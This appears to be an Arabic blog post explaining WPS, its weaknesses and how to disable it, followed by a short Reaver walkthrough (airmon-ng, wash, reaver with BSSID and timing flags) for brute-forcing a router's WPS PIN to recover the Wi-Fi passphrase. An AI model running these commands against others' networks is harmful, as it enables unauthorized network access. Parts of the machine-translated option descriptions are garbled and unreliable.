4‏/1‏/2020

أتصال عن طريق الـ W P S وكسر الوايفاي عن طريقه



 

WPS  اختصار لـ  Wi-Fi Protected Setup  وهو وسيلة لتأسيس اتصال بين جهاز لاسلكي وجهاز راوتر  لاسلكي تم إصداره في عام 2007. عادةً ما يتم توصيل جهاز لاسلكي بجهاز راوتر تحتاج إلى معرفة اسم جهاز الراوتر  (SSID) وكلمة المرور الخاصة بهومع ذلك ، باستخدام WPS ، يمكنك الاتصال بالشبكة باستخدام أي من الطرق أدناه.
§         بالنسبة للأجهزة التي تدعم WPS ، يمكنك إدخال WIN PIN المكون من ثمانية أرقام   على جهاز اللاسلكي للاتصال بجهاز الراوتر  .
§         إذا كان جهاز الراوتر الخاص بك  يحتوي على  زر WPS  خاص به ، فيمكنك الضغط على زر WPS على جهاز الراوتر  ، ثم الضغط على زر WPS على جهازك لتوصيله بالشبكة.
§         اضغط على زر WPS على جهاز الراوتر  ، ثم استخدم جهاز لاسلكي ابحث عن جهاز الراوتر وحدده للاتصال دون الحاجة إلى إدخال كلمة مرور.
§         بالنسبة للأجهزة اللاسلكية التي تحتوي على WPS ، يمكنك إدخال رمز PIN المكون من ثمانية أرقام في إعداد الموجه اللاسلكي لتوصيل الجهاز.

أين هو WPS PIN أو مفتاح WPS؟

يمكن العثور على رقم WPS PIN في الجزء الخلفي أو أسفل الر وتر في معظم أجهزة الر وتر المتاحة حاليا ، يكون رقم WPS PIN على ملصق وهو رقم مكون من ثمانية أرقام.

عيوب مع WPS

على الرغم من أن WPS يمكن أن يسهل توصيل الأجهزة اللاسلكية بشبكتك ، إلا أن هناك بعض عيوب WPS.
§         إذا كان جهاز الراوتر اللاسلكي الخاص بك في منطقة غير آمنة ، فيمكن لأي شخص الضغط على زر WPS في الجزء الخلفي من جهاز التوجيه ويكون قادرًا على الاتصال بشبكتك.
§         نظرًا لأن جميع أجهزة WPS لها رقم تعريف شخصي فريد مكون من ثمانية أرقام (من الناحية الفنية سبعة منذ أن كان الرقم الأخير هو المجموع الاختباري) ، يمكن للمتسلل استخدام هجوم القوة الغاشمة على جهاز التوجيه لتحديد رمز WPS ثم يكون قادرًا على الاتصال بشبكتك.
§         لا يمكن تغيير رقم PIN لجهاز توجيه WPS.
§         يعمل WPS فقط مع أمان WPA أو WPA2 ولا يدعم الأجهزة القديمة مع WEP.
على الرغم من أن WPS يمكن أن يسهل توصيل الأجهزة اللاسلكية بشبكتك بسبب هذه العيوب ، فقد ترغب في تعطيل WPS من خلال إعداد جهاز التوجيه الخاص بك.
تنفذ Reaver هجومًا عنيفًا على القوة ضد إعداد WiFi المحمي والذي يمكنه كسر دبوس WPS لنقطة وصول في غضون ساعات ثم استعادة عبارة المرور WPA / WPA2. على وجه التحديد ، يستهدف Reaver وظيفة المسجل في WPS ، والذي هو معيب لأنه لا يستغرق سوى 11000 محاولة لتخمين دبوس WPS الصحيح من أجل أن تصبح مسجل WPS. بمجرد التسجيل كمسجل لدى نقطة الوصول ، ستمنحك نقطة الوصول عبارة مرور WPA.

تكسير WI-FI مع WPS ENABLED


بدء تشغيل البطاقة اللاسلكية في وضع الشاشة

Air MON – NG start wlan0

 

انظر قائمة الشبكات التي تدعم WPS.

wash -i wlan0mon

باستخدام ريفير


reaver -i wlan0mon -vv -b XX:XX:XX:XX:XX:XX

وصف
من أنا wlan0mon  هذه الواجهة.
-b XX: XX: XX: XX: XX  هو   نقطة الهجوم BSSID .
-VV -V ، - عرض تحذيرات غير حرجة
نظرًا لوجود خيارات إضافية مفيدة -
t 2  - تقلل وقت الاستجابة (5 ثوانٍ بشكل افتراضي) في هذه الحالة إلى ثانيتين.
-d 0  - التوقف المؤقت بين المحاولات.

مفتاح وجدت



التعليقات
0 التعليقات

ليست هناك تعليقات:

إرسال تعليق

الى الأعلى
جميع الحقوق محفوظة ©2019 نقطة التمييز 2017

تصميم وبرمجة للموقع